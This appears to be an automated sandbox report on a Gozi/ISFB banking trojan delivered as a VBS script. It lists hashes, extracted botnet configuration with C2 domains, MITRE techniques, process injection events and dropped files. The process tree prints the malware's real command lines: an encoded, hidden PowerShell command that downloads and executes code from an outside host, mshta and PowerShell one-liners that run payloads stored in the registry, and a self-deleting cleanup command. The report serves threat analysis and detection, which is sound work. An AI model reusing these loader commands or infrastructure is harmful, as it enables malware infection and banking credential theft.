gozi | e7e9df4507c4491b0d533fbfcca44579f7fad5db87f7b10f8cbbfc31b6679bfc

Analysis

max time kernel
151s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
07-10-2023 01:22

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8ad4fd0c0b88ab0d825bcd3d5bea86232dbebbf41f0b3b8de78d5c77eb2de9c6.vbs
Size

22KB
MD5

3dd859f7aa6f95b80aae2c7c4b5eaaf9
SHA1

3ef2f7246e9dee40ca9b6a7ecc0b5c7568367e80
SHA256

8ad4fd0c0b88ab0d825bcd3d5bea86232dbebbf41f0b3b8de78d5c77eb2de9c6
SHA512

9552049edd58c22dac6f081c110eaebbcc23f0c28e3544c8387da5a1be376fbf0b7c777a95bc1277c5246f8588be7632fd9f335d428bdc58864c870d04d9f994
SSDEEP

384:GOjk+QtGIKg7ETp2FHIKIGZVgXFpmcMYqYaGmPUVdE/MMMWm4qVuAL:I9eYjTT//0MjgVuAL

Score

10^/10

gozi 5050 banker isfb trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://communicalink.com/index.php

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

mifrutty.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

http://igrovdow.com

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

15 4212 powershell.exe

flow	pid	process
15	4212	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exemshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Control Panel\International\Geo\Nation	mshta.exe

Executes dropped EXE 1 IoCs

Processes:

efhYtxcZ.exe

pid process

2044 efhYtxcZ.exe

pid	process
2044	efhYtxcZ.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 4060 set thread context of 3088	4060	powershell.exe	Explorer.EXE
PID 3088 set thread context of 3792	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 set thread context of 4004	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 set thread context of 4860	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 set thread context of 3680	3088	Explorer.EXE	cmd.exe
PID 3088 set thread context of 2788	3088	Explorer.EXE	RuntimeBroker.exe
PID 3680 set thread context of 3844	3680	cmd.exe	PING.EXE
PID 3088 set thread context of 3212	3088	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

928 2044 WerFault.exe efhYtxcZ.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

3844 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

3844 PING.EXE

pid	pid_target	process	target process
928	2044	WerFault.exe	efhYtxcZ.exe

pid	process
3844	PING.EXE

pid	process
3844	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeefhYtxcZ.exepowershell.exeExplorer.EXE

pid	process
4212	powershell.exe
4212	powershell.exe
2044	efhYtxcZ.exe
2044	efhYtxcZ.exe
4060	powershell.exe
4060	powershell.exe
4060	powershell.exe
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3088 Explorer.EXE
Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

4060 powershell.exe
3088 Explorer.EXE
3088 Explorer.EXE
3088 Explorer.EXE
3088 Explorer.EXE
3088 Explorer.EXE
3088 Explorer.EXE
3680 cmd.exe

pid	process
3088	Explorer.EXE

pid	process
4060	powershell.exe
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3088	Explorer.EXE
3680	cmd.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

powershell.exepowershell.exeExplorer.EXE

description	pid	process
Token: SeDebugPrivilege	4212	powershell.exe
Token: SeDebugPrivilege	4060	powershell.exe
Token: SeShutdownPrivilege	3088	Explorer.EXE
Token: SeCreatePagefilePrivilege	3088	Explorer.EXE
Token: SeShutdownPrivilege	3088	Explorer.EXE
Token: SeCreatePagefilePrivilege	3088	Explorer.EXE
Token: SeShutdownPrivilege	3088	Explorer.EXE
Token: SeCreatePagefilePrivilege	3088	Explorer.EXE
Token: SeShutdownPrivilege	3088	Explorer.EXE
Token: SeCreatePagefilePrivilege	3088	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3088 Explorer.EXE
Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3088 Explorer.EXE

pid	process
3088	Explorer.EXE

pid	process
3088	Explorer.EXE

Suspicious use of WriteProcessMemory 53 IoCs

Processes:

WScript.execmd.exepowershell.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2616 wrote to memory of 2220	2616	WScript.exe	cmd.exe
PID 2616 wrote to memory of 2220	2616	WScript.exe	cmd.exe
PID 2220 wrote to memory of 4212	2220	cmd.exe	powershell.exe
PID 2220 wrote to memory of 4212	2220	cmd.exe	powershell.exe
PID 4212 wrote to memory of 2044	4212	powershell.exe	efhYtxcZ.exe
PID 4212 wrote to memory of 2044	4212	powershell.exe	efhYtxcZ.exe
PID 4212 wrote to memory of 2044	4212	powershell.exe	efhYtxcZ.exe
PID 4208 wrote to memory of 4060	4208	mshta.exe	powershell.exe
PID 4208 wrote to memory of 4060	4208	mshta.exe	powershell.exe
PID 4060 wrote to memory of 2588	4060	powershell.exe	csc.exe
PID 4060 wrote to memory of 2588	4060	powershell.exe	csc.exe
PID 2588 wrote to memory of 3168	2588	csc.exe	cvtres.exe
PID 2588 wrote to memory of 3168	2588	csc.exe	cvtres.exe
PID 4060 wrote to memory of 2136	4060	powershell.exe	csc.exe
PID 4060 wrote to memory of 2136	4060	powershell.exe	csc.exe
PID 2136 wrote to memory of 1404	2136	csc.exe	cvtres.exe
PID 2136 wrote to memory of 1404	2136	csc.exe	cvtres.exe
PID 4060 wrote to memory of 3088	4060	powershell.exe	Explorer.EXE
PID 4060 wrote to memory of 3088	4060	powershell.exe	Explorer.EXE
PID 4060 wrote to memory of 3088	4060	powershell.exe	Explorer.EXE
PID 4060 wrote to memory of 3088	4060	powershell.exe	Explorer.EXE
PID 3088 wrote to memory of 3792	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 wrote to memory of 3792	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 wrote to memory of 3680	3088	Explorer.EXE	cmd.exe
PID 3088 wrote to memory of 3680	3088	Explorer.EXE	cmd.exe
PID 3088 wrote to memory of 3680	3088	Explorer.EXE	cmd.exe
PID 3088 wrote to memory of 3792	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 wrote to memory of 3792	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 wrote to memory of 4004	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 wrote to memory of 4004	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 wrote to memory of 4004	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 wrote to memory of 4004	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 wrote to memory of 4860	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 wrote to memory of 4860	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 wrote to memory of 4860	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 wrote to memory of 3680	3088	Explorer.EXE	cmd.exe
PID 3088 wrote to memory of 4860	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 wrote to memory of 3680	3088	Explorer.EXE	cmd.exe
PID 3088 wrote to memory of 2788	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 wrote to memory of 2788	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 wrote to memory of 2788	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 wrote to memory of 2788	3088	Explorer.EXE	RuntimeBroker.exe
PID 3088 wrote to memory of 3212	3088	Explorer.EXE	cmd.exe
PID 3088 wrote to memory of 3212	3088	Explorer.EXE	cmd.exe
PID 3088 wrote to memory of 3212	3088	Explorer.EXE	cmd.exe
PID 3088 wrote to memory of 3212	3088	Explorer.EXE	cmd.exe
PID 3680 wrote to memory of 3844	3680	cmd.exe	PING.EXE
PID 3680 wrote to memory of 3844	3680	cmd.exe	PING.EXE
PID 3680 wrote to memory of 3844	3680	cmd.exe	PING.EXE
PID 3680 wrote to memory of 3844	3680	cmd.exe	PING.EXE
PID 3680 wrote to memory of 3844	3680	cmd.exe	PING.EXE
PID 3088 wrote to memory of 3212	3088	Explorer.EXE	cmd.exe
PID 3088 wrote to memory of 3212	3088	Explorer.EXE	cmd.exe

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3792

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8ad4fd0c0b88ab0d825bcd3d5bea86232dbebbf41f0b3b8de78d5c77eb2de9c6.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2616

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
2⤵
- Suspicious use of WriteProcessMemory
PID:2220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA==
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4212

C:\Users\Admin\AppData\Local\Temp\efhYtxcZ.exe
"C:\Users\Admin\AppData\Local\Temp\efhYtxcZ.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2044 -s 472
5⤵
- Program crash
PID:928

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4860

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4004

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3088

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>C21q='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(C21q).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\5C68964F-0BE8-EE1D-7550-6F0279841356\\\MaskControl'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4208

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jxjdjga -value gp; new-alias -name owipcnveb -value iex; owipcnveb ([System.Text.Encoding]::ASCII.GetString((jxjdjga "HKCU:Software\AppDataLow\Software\Microsoft\5C68964F-0BE8-EE1D-7550-6F0279841356").PlaySystem))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4060

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qozlyi2k\qozlyi2k.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2588

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2EFA.tmp" "c:\Users\Admin\AppData\Local\Temp\qozlyi2k\CSC37098DF811AE4245AB54B11478F64F49.TMP"
5⤵
PID:3168

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nuveqce2\nuveqce2.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:2136

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES2FB6.tmp" "c:\Users\Admin\AppData\Local\Temp\nuveqce2\CSC429CE35DE6FA4508A0DC6FAB23C7061.TMP"
5⤵
PID:1404

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\efhYtxcZ.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3680

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:3844

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:3212

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:2788

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2044 -ip 2044
1⤵
PID:4824

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Remote System Discovery

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
8d80c45e0e047b75073a3d1c2710c68f

SHA1
babc73cf30327b36d184239a2747ec94d48929f4

SHA256
6859c4cad4b17bf02f7f25d9b5b9633491a29c1420ccbdf9342a459d5be05e64

SHA512
5da876ce855d1d9a031899d283bf2ac6c53c4d14982a1300e4d128cbde46202a259d1299dfb40c81fcfe5fb6770fb00f404673c13967800392f8f8442a5d2d24

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2EFA.tmp
Filesize
1KB

MD5
e15715f238c7188f1d87e778adfffb68

SHA1
52ae4b154ddb419a15ceb382b4b6818134f12570

SHA256
db435cbe16758c7aabdc836a9bded0a7214db2291b3c64dddbbc7a4351fd7c49

SHA512
52b924f8a94738793c6d6ccef8ddfc21deb8cc04989a372877572302b6ef372dd1032cd14c10dcab97083d4b81ef72cda44f91a918d081dd63c248ec8f7c5222

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES2FB6.tmp
Filesize
1KB

MD5
cdce889163d92dcd789eb8df3884e699

SHA1
18ceb16d933a4a5a87a32728b1209edef702eea3

SHA256
40e53c93f5c7931ce462daf642a4376da4257e7182ec8eb6f31f29906f204298

SHA512
41019280daad9719a7df899f5c0a7ba1d74e4f709cc749b565e0b986da32b98b5077b0c87d6cc9a9624f120a69588261315a09b991e8723ba31cfdb6b5865c36

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qv1tvyd1.dnu.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\efhYtxcZ.exe
Filesize
274KB

MD5
d18f3fecf6d28ddd0f4cf4a9b53c0aec

SHA1
05263b9ec69fcf48cc71443ba23545fabe21df12

SHA256
911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

SHA512
4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512

Download Submit
C:\Users\Admin\AppData\Local\Temp\efhYtxcZ.exe
Filesize
274KB

MD5
d18f3fecf6d28ddd0f4cf4a9b53c0aec

SHA1
05263b9ec69fcf48cc71443ba23545fabe21df12

SHA256
911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

SHA512
4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512

Download Submit
C:\Users\Admin\AppData\Local\Temp\efhYtxcZ.exe
Filesize
274KB

MD5
d18f3fecf6d28ddd0f4cf4a9b53c0aec

SHA1
05263b9ec69fcf48cc71443ba23545fabe21df12

SHA256
911bb31927c7250b4741063159cccf6549e4a28ce6b0a5043d3392c7fce401e4

SHA512
4629ce7f35716bd2c0fc3c14104251c6b2f3eaf07f7b35cf181654d6bc9be85bda6cb6f802b00f98c6bbb446db4790940605dcf8f8d6391282281ac029ff0512

Download Submit
C:\Users\Admin\AppData\Local\Temp\nuveqce2\nuveqce2.dll
Filesize
3KB

MD5
e8e531dfe9af8c8868b68e389dcb6a9e

SHA1
b6eeb389c70a9749ccf9e5670102dc06b251c439

SHA256
b7c1269b06d8b06aff8ea625d28540c24877d16c0bd5f4dd40eeb63910cae75b

SHA512
72a040732749977be2df2c1e9c7caf7c7da637b93d0a0595bef886546be6baea0af95b63a4888e9d736c0c3833fb8488b6e0d7e3be8feb6231b26424c76dc072

Download Submit
C:\Users\Admin\AppData\Local\Temp\qozlyi2k\qozlyi2k.dll
Filesize
3KB

MD5
ed4f00c3d23c75f6e794f171cf6ea7be

SHA1
0eb294d9aa314793a250be7b40803f67625169ca

SHA256
ffede4e4e61b256d1b369f72d17c7647ab239de2936a94324ee23e070d31dee5

SHA512
f324ac07433e7dbdba83e0b3412e4218bbb3a078e6129fd998d6797833bd08da051bac3f59f3d9226ffbb8ccc5aee90d11808d4379d9514b55ffb418edbfa67a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nuveqce2\CSC429CE35DE6FA4508A0DC6FAB23C7061.TMP
Filesize
652B

MD5
73cb3b4b6280e039a9554a57d8c64e30

SHA1
615af42388b5356ca2de6b917a9ae946c8a1c556

SHA256
b51b096b77967c7084f8942b7cf657c54cf986eb28ded143f9079c1701ae92e1

SHA512
2ab3113723f392bd82995c89ffc5ff3378b442c252a8a19fed7d663e54dacf6996ebeee0b8d3ea5c648e57ba1b48a2dcacb6fa1494fbdfa57572573dd3fc8086

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nuveqce2\nuveqce2.0.cs
Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nuveqce2\nuveqce2.cmdline
Filesize
369B

MD5
a6a21553a3ea2d840288b916dd139aa2

SHA1
dc2d06461bee907e6a38431f0e94f30afbb316b9

SHA256
97bba4d22eb39c2133e618f86ca496e183b0ef088bcb0c1b1069bfd09d436b8b

SHA512
8b008c5f2805faef7a5699baa55c8cee7d271cb12645621891522dcae4dbec0834f6b7fdd721ee450f879d076de8f101864c90c3ae57ab931ee3840de39d2752

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qozlyi2k\CSC37098DF811AE4245AB54B11478F64F49.TMP
Filesize
652B

MD5
24bb7eac38d04890c18ce4a5ea901cb0

SHA1
7ed23ededa2f4a6608bbe745c144c1b838cc9167

SHA256
608f758dd66a7dc24f4cda01752020b69d5e102d8ad78b8bde9100d906c36996

SHA512
6567a0362afbd094b09dac2a9746f4942b48299e6b645e6bf86435fc01cb379368b460c0a32c21ad97a4a8e8b1da54072fb9b17eec8302636887be2da44effc3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qozlyi2k\qozlyi2k.0.cs
Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\qozlyi2k\qozlyi2k.cmdline
Filesize
369B

MD5
d7252db059a0777aa4a77ebb35f2a075

SHA1
876471b1b06e5892bb9ba0fe7de6b13e51721ee3

SHA256
1f61b82fecd86f6dc2a7ddd37f2c8d132dccf8ae2de037da43b5e942bc9db4a8

SHA512
2121b93605ae16d1b833e064619689a5fcfd82c88069291ed9b7de4656ee97abcd570242944fb071c36209bdc71203b271c8c6ac71118a31ec2213f03df5552f

Download Submit
memory/2044-32-0x0000000000400000-0x000000000228B000-memory.dmp

Filesize
30.5MB

Download
memory/2044-27-0x0000000002310000-0x000000000231B000-memory.dmp

Filesize
44KB

Download
memory/2044-34-0x0000000002330000-0x000000000233D000-memory.dmp

Filesize
52KB

Download
memory/2044-37-0x0000000000400000-0x000000000228B000-memory.dmp

Filesize
30.5MB

Download
memory/2044-31-0x0000000002310000-0x000000000231B000-memory.dmp

Filesize
44KB

Download
memory/2044-138-0x0000000000400000-0x000000000228B000-memory.dmp

Filesize
30.5MB

Download
memory/2044-33-0x0000000000400000-0x000000000228B000-memory.dmp

Filesize
30.5MB

Download
memory/2044-26-0x00000000023B0000-0x00000000024B0000-memory.dmp

Filesize
1024KB

Download
memory/2044-30-0x0000000000400000-0x000000000228B000-memory.dmp

Filesize
30.5MB

Download
memory/2044-29-0x00000000023B0000-0x00000000024B0000-memory.dmp

Filesize
1024KB

Download
memory/2044-28-0x0000000000400000-0x000000000228B000-memory.dmp

Filesize
30.5MB

Download
memory/2788-121-0x0000026339240000-0x00000263392E4000-memory.dmp

Filesize
656KB

Download
memory/2788-122-0x0000026338B10000-0x0000026338B11000-memory.dmp

Filesize
4KB

Download
memory/3088-84-0x0000000009120000-0x00000000091C4000-memory.dmp

Filesize
656KB

Download
memory/3088-85-0x0000000002B70000-0x0000000002B71000-memory.dmp

Filesize
4KB

Download
memory/3088-129-0x0000000009120000-0x00000000091C4000-memory.dmp

Filesize
656KB

Download
memory/3212-137-0x0000000001830000-0x00000000018C8000-memory.dmp

Filesize
608KB

Download
memory/3212-135-0x00000000013C0000-0x00000000013C1000-memory.dmp

Filesize
4KB

Download
memory/3212-128-0x0000000001830000-0x00000000018C8000-memory.dmp

Filesize
608KB

Download
memory/3680-143-0x0000022DC7890000-0x0000022DC7934000-memory.dmp

Filesize
656KB

Download
memory/3680-111-0x0000022DC7890000-0x0000022DC7934000-memory.dmp

Filesize
656KB

Download
memory/3680-115-0x0000022DC7580000-0x0000022DC7581000-memory.dmp

Filesize
4KB

Download
memory/3792-139-0x0000017119E10000-0x0000017119EB4000-memory.dmp

Filesize
656KB

Download
memory/3792-97-0x0000017119E10000-0x0000017119EB4000-memory.dmp

Filesize
656KB

Download
memory/3792-98-0x0000017119BD0000-0x0000017119BD1000-memory.dmp

Filesize
4KB

Download
memory/3844-132-0x00000178D92C0000-0x00000178D92C1000-memory.dmp

Filesize
4KB

Download
memory/3844-127-0x00000178D94F0000-0x00000178D9594000-memory.dmp

Filesize
656KB

Download
memory/3844-142-0x00000178D94F0000-0x00000178D9594000-memory.dmp

Filesize
656KB

Download
memory/4004-141-0x000001A16B720000-0x000001A16B7C4000-memory.dmp

Filesize
656KB

Download
memory/4004-103-0x000001A16B720000-0x000001A16B7C4000-memory.dmp

Filesize
656KB

Download
memory/4004-104-0x000001A1693C0000-0x000001A1693C1000-memory.dmp

Filesize
4KB

Download
memory/4060-82-0x000002E0605B0000-0x000002E0605ED000-memory.dmp

Filesize
244KB

Download
memory/4060-80-0x000002E0605A0000-0x000002E0605A8000-memory.dmp

Filesize
32KB

Download
memory/4060-66-0x000002E060430000-0x000002E060438000-memory.dmp

Filesize
32KB

Download
memory/4060-43-0x000002E060450000-0x000002E060460000-memory.dmp

Filesize
64KB

Download
memory/4060-94-0x00007FF89CF00000-0x00007FF89D9C1000-memory.dmp

Filesize
10.8MB

Download
memory/4060-95-0x000002E0605B0000-0x000002E0605ED000-memory.dmp

Filesize
244KB

Download
memory/4060-42-0x000002E060450000-0x000002E060460000-memory.dmp

Filesize
64KB

Download
memory/4060-41-0x00007FF89CF00000-0x00007FF89D9C1000-memory.dmp

Filesize
10.8MB

Download
memory/4212-10-0x00007FF89F5F0000-0x00007FF8A00B1000-memory.dmp

Filesize
10.8MB

Download
memory/4212-11-0x000001DF1E0A0000-0x000001DF1E0B0000-memory.dmp

Filesize
64KB

Download
memory/4212-9-0x000001DF1E9D0000-0x000001DF1E9F2000-memory.dmp

Filesize
136KB

Download
memory/4212-12-0x000001DF1E0A0000-0x000001DF1E0B0000-memory.dmp

Filesize
64KB

Download
memory/4212-13-0x000001DF1E0A0000-0x000001DF1E0B0000-memory.dmp

Filesize
64KB

Download
memory/4212-24-0x00007FF89F5F0000-0x00007FF8A00B1000-memory.dmp

Filesize
10.8MB

Download
memory/4860-112-0x00000221A7FF0000-0x00000221A7FF1000-memory.dmp

